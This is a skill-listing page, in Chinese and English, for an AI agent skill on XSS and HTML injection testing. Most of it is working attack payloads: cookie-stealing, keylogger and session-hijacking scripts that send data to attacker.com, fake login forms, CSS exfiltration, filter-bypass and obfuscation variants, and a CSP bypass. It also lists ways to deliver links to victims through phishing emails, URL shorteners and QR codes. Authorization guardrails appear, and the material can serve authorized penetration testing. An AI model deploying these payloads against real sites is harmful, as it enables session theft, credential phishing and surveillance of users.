跨站脚本与HTML注入测试指南：识别XSS漏洞、会话劫持与安全防护

Cross-Site Scripting and HTML Injection Testing by automindtechnologie-jpg/ultimate-skill.md

安装命令

npx skills add https://github.com/automindtechnologie-jpg/ultimate-skill.md --skill 'Cross-Site Scripting and HTML Injection Testing'

测试安全

🇨🇳中文介绍

跨站脚本与HTML注入测试

目的

对Web应用程序执行全面的客户端注入漏洞评估，以识别XSS和HTML注入缺陷，演示会话劫持和凭据窃取利用技术，并验证输入清理和输出编码机制。此技能支持跨存储型、反射型和基于DOM的攻击向量进行系统性检测和利用。

输入/先决条件

所需访问权限

包含用户输入字段的目标Web应用程序URL
用于请求分析的Burp Suite或浏览器开发者工具
创建测试账户以进行存储型XSS测试的权限
启用JavaScript控制台的浏览器

技术要求

理解浏览器上下文中的JavaScript执行
了解HTML DOM结构及操作
熟悉HTTP请求/响应头
理解Cookie属性和会话管理

法律先决条件

安全测试的书面授权
包含目标域名和功能的明确定义范围
关于处理任何捕获的会话数据的协议
已建立的事件响应流程

输出/交付物

包含严重性分类的XSS/HTMLi漏洞报告
展示影响的漏洞利用概念验证载荷
会话劫持演示（受控环境）
包含CSP配置的修复建议

核心工作流程

阶段1：漏洞检测

识别输入反射点

定位用户输入在响应中反射的区域：

# 常见注入向量
- 搜索框和查询参数
- 用户资料字段（姓名、简介、评论）
- URL片段和哈希值
- 显示用户输入的错误消息
- 仅具有客户端验证的表单字段
- 隐藏表单字段和参数
- HTTP头部（User-Agent、Referer）

基本检测测试

插入测试字符串以观察应用程序行为：

<!-- 基本反射测试 -->
<test123>

<!-- 脚本标签测试 -->
<script>alert('XSS')</script>

<!-- 事件处理器测试 -->
<img src=x onerror=alert('XSS')>

<!-- 基于SVG的测试 -->
<svg onload=alert('XSS')>

<!-- Body事件测试 -->
<body onload=alert('XSS')>

监控以下情况：

未经编码的原始HTML反射
部分编码（某些字符被转义）
浏览器控制台中的JavaScript执行
检查器中可见的DOM修改

确定XSS类型

存储型XSS指标：

输入在页面刷新后持续存在
其他用户能看到注入的内容
内容存储在数据库/文件系统中

反射型XSS指标：

输入仅出现在当前响应中
需要受害者点击精心构造的URL
跨会话无持久性

基于DOM的XSS指标：

输入由客户端JavaScript处理
服务器响应不包含载荷
利用完全在浏览器中发生

阶段2：存储型XSS利用

识别存储位置

针对具有持久性用户内容的区域：

- 评论区和论坛
- 用户资料字段（显示名称、简介、位置）
- 产品评价和评分
- 私信和聊天系统
- 文件上传元数据（文件名、描述）
- 配置设置和偏好

构造持久性载荷

<!-- Cookie窃取载荷 -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- 键盘记录器注入 -->
<script>
document.onkeypress=function(e){
  new Image().src='http://attacker.com/log?k='+e.key;
}
</script>

<!-- 会话劫持 -->
<script>
fetch('http://attacker.com/capture',{
  method:'POST',
  body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>

<!-- 钓鱼表单注入 -->
<div id="login">
<h2>会话已过期 - 请登录</h2>
<form action="http://attacker.com/phish" method="POST">
用户名: <input name="user"><br>
密码: <input type="password" name="pass"><br>
<input type="submit" value="登录">
</form>
</div>

阶段3：反射型XSS利用

构造恶意URL

构建包含XSS载荷的URL：

# 基本反射载荷
https://target.com/search?q=<script>alert(document.domain)</script>

# URL编码载荷
https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E

# 参数中的事件处理器
https://target.com/page?name="><img src=x onerror=alert(1)>

# 基于片段的（用于DOM XSS）
https://target.com/page#<script>alert(1)</script>

交付方法

向受害者交付反射型XSS的技术：

1. 包含精心构造链接的钓鱼邮件
2. 社交媒体消息分发
3. 使用URL缩短器隐藏载荷
4. 编码恶意URL的二维码
5. 通过受信任域的重定向链

阶段4：基于DOM的XSS利用

识别易受攻击的接收器

定位处理用户输入的JavaScript函数：

// 危险的接收器
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.insertAdjacentHTML()
eval()
setTimeout()
setInterval()
Function()
location.href
location.assign()
location.replace()

识别来源

定位用户控制数据进入应用程序的位置：

// 用户可控来源
location.hash
location.search
location.href
document.URL
document.referrer
window.name
postMessage数据
localStorage/sessionStorage

DOM XSS载荷

// 基于哈希的注入
https://target.com/page#<img src=x onerror=alert(1)>

// URL参数注入（客户端处理）
https://target.com/page?default=<script>alert(1)</script>

// PostMessage利用
// 在攻击者页面上：
<iframe src="https://target.com/vulnerable"></iframe>
<script>
frames[0].postMessage('<img src=x onerror=alert(1)>','*');
</script>

阶段5：HTML注入技术

反射型HTML注入

在不使用JavaScript的情况下修改页面外观：

<!-- 内容注入 -->
<h1>网站被黑</h1>

<!-- 表单劫持 -->
<form action="http://attacker.com/capture">
<input name="credentials" placeholder="输入密码">
<button>提交</button>
</form>

<!-- CSS注入用于数据外泄 -->
<style>
input[value^="a"]{background:url(http://attacker.com/a)}
input[value^="b"]{background:url(http://attacker.com/b)}
</style>

<!-- iframe注入 -->
<iframe src="http://attacker.com/phishing" style="position:absolute;top:0;left:0;width:100%;height:100%"></iframe>

存储型HTML注入

持久性内容操作：

<!-- 跑马灯干扰 -->
<marquee>重要安全通知：您的账户已被入侵！</marquee>

<!-- 样式覆盖 -->
<style>body{background:red !important;}</style>

<!-- 使用CSS隐藏内容 -->
<div style="position:fixed;top:0;left:0;width:100%;background:white;z-index:9999;">
此处放置虚假登录表单或误导性内容
</div>

阶段6：过滤器绕过技术

标签和属性变体

<!-- 大小写变体 -->
<ScRiPt>alert(1)</sCrIpT>
<IMG SRC=x ONERROR=alert(1)>

<!-- 替代标签 -->
<svg/onload=alert(1)>
<body/onload=alert(1)>
<marquee/onstart=alert(1)>
<details/open/ontoggle=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>

<!-- 格式错误的标签 -->
<img src=x onerror=alert(1)//
<img """><script>alert(1)</script>">

编码绕过

<!-- HTML实体编码 -->
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

<!-- 十六进制编码 -->
<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

<!-- Unicode编码 -->
<script>\u0061lert(1)</script>

<!-- 混合编码 -->
<img src=x onerror=\u0061\u006cert(1)>

JavaScript混淆

// 字符串拼接
<script>eval('al'+'ert(1)')</script>

// 模板字面量
<script>alert`1`</script>

// 构造函数执行
<script>[].constructor.constructor('alert(1)')()</script>

// Base64编码
<script>eval(atob('YWxlcnQoMSk='))</script>

// 不使用括号
<script>alert`1`</script>
<script>throw/a]a]/.source+onerror=alert</script>

空白和注释绕过

<!-- 制表符/换行符插入 -->
<img src=x	onerror
=alert(1)>

<!-- JavaScript注释 -->
<script>/**/alert(1)/**/</script>

<!-- 属性中的HTML注释 -->
<img src=x onerror="alert(1)"<!--comment-->

快速参考

XSS检测清单

1. 插入 <script>alert(1)</script> → 检查执行
2. 插入 <img src=x onerror=alert(1)> → 检查事件处理器
3. 插入 "><script>alert(1)</script> → 测试属性转义
4. 插入 javascript:alert(1) → 测试href/src属性
5. 检查URL哈希处理 → DOM XSS潜力

常见XSS载荷

上下文	载荷
HTML正文	`<script>alert(1)</script>`
HTML属性	`"><script>alert(1)</script>`
JavaScript字符串	`';alert(1)//`
JavaScript模板	`${alert(1)}`
URL属性	`javascript:alert(1)`
CSS上下文	`</style><script>alert(1)</script>`

Cookie窃取载荷

<script>
new Image().src='http://attacker.com/c='+btoa(document.cookie);
</script>

会话劫持模板

<script>
fetch('https://attacker.com/log',{
  method:'POST',
  mode:'no-cors',
  body:JSON.stringify({
    cookies:document.cookie,
    localStorage:JSON.stringify(localStorage),
    url:location.href
  })
});
</script>

约束与防护措施

操作边界

切勿注入可能损坏生产系统的载荷
仅将Cookie/会话捕获用于演示目的
避免可能传播给非目标用户的载荷（蠕虫行为）
不要外泄超出范围要求的真实用户数据

技术限制

内容安全策略（CSP）可能阻止内联脚本
HttpOnly Cookie阻止JavaScript访问
SameSite Cookie属性限制跨源攻击
现代框架通常自动转义输出

法律和道德要求

测试前需要书面授权
立即报告关键XSS漏洞
根据数据保护协议处理捕获的凭据
不得使用发现的漏洞进行未经授权的访问

示例

示例1：评论区的存储型XSS

场景：博客评论功能存在存储型XSS漏洞

检测：

POST /api/comments
Content-Type: application/json

{"body": "<script>alert('XSS')</script>", "postId": 123}

观察：评论渲染且脚本对所有查看者执行

利用载荷：

<script>
var i = new Image();
i.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

结果：每个查看评论的用户都会将其会话Cookie发送到攻击者的服务器。

示例2：通过搜索参数的反射型XSS

场景：搜索结果页面反射查询内容而未编码

易受攻击的URL：

https://shop.example.com/search?q=test

检测测试：

https://shop.example.com/search?q=<script>alert(document.domain)</script>

精心构造的攻击URL：

https://shop.example.com/search?q=%3Cimg%20src=x%20onerror=%22fetch('https://attacker.com/log?c='+document.cookie)%22%3E

交付：URL通过钓鱼邮件发送给目标用户。

示例3：通过哈希片段的基于DOM的XSS

场景：JavaScript读取URL哈希并将其插入DOM

易受攻击的代码：

document.getElementById('welcome').innerHTML = 'Hello, ' + location.hash.slice(1);

攻击URL：

https://app.example.com/dashboard#<img src=x onerror=alert(document.cookie)>

结果：脚本完全在客户端执行；载荷从未接触服务器。

示例4：通过JSONP端点的CSP绕过

场景：网站有CSP但允许受信任的CDN

CSP头部：

Content-Security-Policy: script-src 'self' https://cdn.trusted.com

绕过：在受信任域上查找JSONP端点：

<script src="https://cdn.trusted.com/api/jsonp?callback=alert"></script>

结果：使用允许的脚本源绕过CSP。

故障排除

问题	解决方案
脚本未执行	检查CSP阻止；验证编码；尝试事件处理器（img、svg onerror）；确认JS已启用
载荷出现但不执行	使用`"`或`'`跳出属性上下文；检查是否在注释内；测试不同上下文
Cookie不可访问	检查HttpOnly标志；尝试localStorage/sessionStorage；使用no-cors模式
CSP阻止载荷	在允许列表域上查找JSONP；检查unsafe-inline；测试base-uri绕过
WAF阻止请求	使用编码变体；片段载荷；空字节；大小写变体

每周安装次数

仓库

automindtechnol…skill.md

首次出现

1970年1月1日

安全审计

Gen Agent Trust HubPass SocketWarn SnykFail

🇺🇸English

Cross-Site Scripting and HTML Injection Testing

Purpose

Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.

Inputs / Prerequisites

Required Access

Target web application URL with user input fields
Burp Suite or browser developer tools for request analysis
Access to create test accounts for stored XSS testing
Browser with JavaScript console enabled

Technical Requirements

Understanding of JavaScript execution in browser context
Knowledge of HTML DOM structure and manipulation
Familiarity with HTTP request/response headers
Understanding of cookie attributes and session management

Legal Prerequisites

Written authorization for security testing
Defined scope including target domains and features
Agreement on handling of any captured session data
Incident response procedures established

Outputs / Deliverables

XSS/HTMLi vulnerability report with severity classifications
Proof-of-concept payloads demonstrating impact
Session hijacking demonstrations (controlled environment)
Remediation recommendations with CSP configurations

Core Workflow

Phase 1: Vulnerability Detection

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

Phase 2: Stored XSS Exploitation

Identify Storage Locations

Target areas with persistent user content:

- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences

Craft Persistent Payloads

<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- Keylogger injection -->
<script>
document.onkeypress=function(e){
  new Image().src='http://attacker.com/log?k='+e.key;
}
</script>

<!-- Session hijacking -->
<script>
fetch('http://attacker.com/capture',{
  method:'POST',
  body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>

<!-- Phishing form injection -->
<div id="login">
<h2>Session Expired - Please Login</h2>
<form action="http://attacker.com/phish" method="POST">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</div>

Phase 3: Reflected XSS Exploitation

Construct Malicious URLs

Build URLs containing XSS payloads:

# Basic reflected payload
https://target.com/search?q=<script>alert(document.domain)</script>

# URL-encoded payload
https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E

# Event handler in parameter
https://target.com/page?name="><img src=x onerror=alert(1)>

# Fragment-based (for DOM XSS)
https://target.com/page#<script>alert(1)</script>

Techniques for delivering reflected XSS to victims:

1. Phishing emails with crafted links
2. Social media message distribution
3. URL shorteners to obscure payload
4. QR codes encoding malicious URLs
5. Redirect chains through trusted domains

Phase 4: DOM-Based XSS Exploitation

Identify Vulnerable Sinks

Locate JavaScript functions that process user input:

// Dangerous sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.insertAdjacentHTML()
eval()
setTimeout()
setInterval()
Function()
location.href
location.assign()
location.replace()

Locate where user-controlled data enters the application:

// User-controllable sources
location.hash
location.search
location.href
document.URL
document.referrer
window.name
postMessage data
localStorage/sessionStorage

// Hash-based injection
https://target.com/page#<img src=x onerror=alert(1)>

// URL parameter injection (processed client-side)
https://target.com/page?default=<script>alert(1)</script>

// PostMessage exploitation
// On attacker page:
<iframe src="https://target.com/vulnerable"></iframe>
<script>
frames[0].postMessage('<img src=x onerror=alert(1)>','*');
</script>

Phase 5: HTML Injection Techniques

Reflected HTML Injection

Modify page appearance without JavaScript:

<!-- Content injection -->
<h1>SITE HACKED</h1>

<!-- Form hijacking -->
<form action="http://attacker.com/capture">
<input name="credentials" placeholder="Enter password">
<button>Submit</button>
</form>

<!-- CSS injection for data exfiltration -->
<style>
input[value^="a"]{background:url(http://attacker.com/a)}
input[value^="b"]{background:url(http://attacker.com/b)}
</style>

<!-- iframe injection -->
<iframe src="http://attacker.com/phishing" style="position:absolute;top:0;left:0;width:100%;height:100%"></iframe>

Stored HTML Injection

Persistent content manipulation:

<!-- Marquee disruption -->
<marquee>Important Security Notice: Your account is compromised!</marquee>

<!-- Style override -->
<style>body{background:red !important;}</style>

<!-- Hidden content with CSS -->
<div style="position:fixed;top:0;left:0;width:100%;background:white;z-index:9999;">
Fake login form or misleading content here
</div>

Phase 6: Filter Bypass Techniques

Tag and Attribute Variations

<!-- Case variation -->
<ScRiPt>alert(1)</sCrIpT>
<IMG SRC=x ONERROR=alert(1)>

<!-- Alternative tags -->
<svg/onload=alert(1)>
<body/onload=alert(1)>
<marquee/onstart=alert(1)>
<details/open/ontoggle=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>

<!-- Malformed tags -->
<img src=x onerror=alert(1)//
<img """><script>alert(1)</script>">

<!-- HTML entity encoding -->
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

<!-- Hex encoding -->
<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>

<!-- Unicode encoding -->
<script>\u0061lert(1)</script>

<!-- Mixed encoding -->
<img src=x onerror=\u0061\u006cert(1)>

JavaScript Obfuscation

// String concatenation
<script>eval('al'+'ert(1)')</script>

// Template literals
<script>alert`1`</script>

// Constructor execution
<script>[].constructor.constructor('alert(1)')()</script>

// Base64 encoding
<script>eval(atob('YWxlcnQoMSk='))</script>

// Without parentheses
<script>alert`1`</script>
<script>throw/a]a]/.source+onerror=alert</script>

Whitespace and Comment Bypass

<!-- Tab/newline insertion -->
<img src=x	onerror
=alert(1)>

<!-- JavaScript comments -->
<script>/**/alert(1)/**/</script>

<!-- HTML comments in attributes -->
<img src=x onerror="alert(1)"<!--comment-->

XSS Detection Checklist

1. Insert <script>alert(1)</script> → Check execution
2. Insert <img src=x onerror=alert(1)> → Check event handler
3. Insert "><script>alert(1)</script> → Test attribute escape
4. Insert javascript:alert(1) → Test href/src attributes
5. Check URL hash handling → DOM XSS potential

Context	Payload
HTML body	`<script>alert(1)</script>`
HTML attribute	`"><script>alert(1)</script>`
JavaScript string	`';alert(1)//`
JavaScript template	`${alert(1)}`
URL attribute	`javascript:alert(1)`
CSS context	`</style><script>alert(1)</script>`
SVG context	`<svg onload=alert(1)>`

Cookie Theft Payload

<script>
new Image().src='http://attacker.com/c='+btoa(document.cookie);
</script>

Session Hijacking Template

<script>
fetch('https://attacker.com/log',{
  method:'POST',
  mode:'no-cors',
  body:JSON.stringify({
    cookies:document.cookie,
    localStorage:JSON.stringify(localStorage),
    url:location.href
  })
});
</script>

Constraints and Guardrails

Operational Boundaries

Never inject payloads that could damage production systems
Limit cookie/session capture to demonstration purposes only
Avoid payloads that could spread to unintended users (worm behavior)
Do not exfiltrate real user data beyond scope requirements

Technical Limitations

Content Security Policy (CSP) may block inline scripts
HttpOnly cookies prevent JavaScript access
SameSite cookie attributes limit cross-origin attacks
Modern frameworks often auto-escape outputs

Legal and Ethical Requirements

Written authorization required before testing
Report critical XSS vulnerabilities immediately
Handle captured credentials per data protection agreements
Do not use discovered vulnerabilities for unauthorized access

Example 1: Stored XSS in Comment Section

Scenario : Blog comment feature vulnerable to stored XSS

POST /api/comments
Content-Type: application/json

{"body": "<script>alert('XSS')</script>", "postId": 123}

Observation : Comment renders and script executes for all viewers

Exploitation Payload :

<script>
var i = new Image();
i.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

Result : Every user viewing the comment has their session cookie sent to attacker's server.

Example 2: Reflected XSS via Search Parameter

Scenario : Search results page reflects query without encoding

Vulnerable URL :

https://shop.example.com/search?q=test

Detection Test :

https://shop.example.com/search?q=<script>alert(document.domain)</script>

Crafted Attack URL :

https://shop.example.com/search?q=%3Cimg%20src=x%20onerror=%22fetch('https://attacker.com/log?c='+document.cookie)%22%3E

Delivery : URL sent via phishing email to target user.

Example 3: DOM-Based XSS via Hash Fragment

Scenario : JavaScript reads URL hash and inserts into DOM

Vulnerable Code :

document.getElementById('welcome').innerHTML = 'Hello, ' + location.hash.slice(1);

https://app.example.com/dashboard#<img src=x onerror=alert(document.cookie)>

Result : Script executes entirely client-side; payload never touches server.

Example 4: CSP Bypass via JSONP Endpoint

Scenario : Site has CSP but allows trusted CDN

Content-Security-Policy: script-src 'self' https://cdn.trusted.com

Bypass : Find JSONP endpoint on trusted domain:

<script src="https://cdn.trusted.com/api/jsonp?callback=alert"></script>

Result : CSP bypassed using allowed script source.

Issue	Solutions
Script not executing	Check CSP blocking; verify encoding; try event handlers (img, svg onerror); confirm JS enabled
Payload appears but doesn't execute	Break out of attribute context with `"` or `'`; check if inside comment; test different contexts
Cookies not accessible	Check HttpOnly flag; try localStorage/sessionStorage; use no-cors mode
CSP blocking payloads	Find JSONP on whitelisted domains; check for unsafe-inline; test base-uri bypass
WAF blocking requests	Use encoding variations; fragment payload; null bytes; case variations

xdrop 文件传输脚本：Bun 环境下安全上传下载工具，支持加密分享

24,700 周安装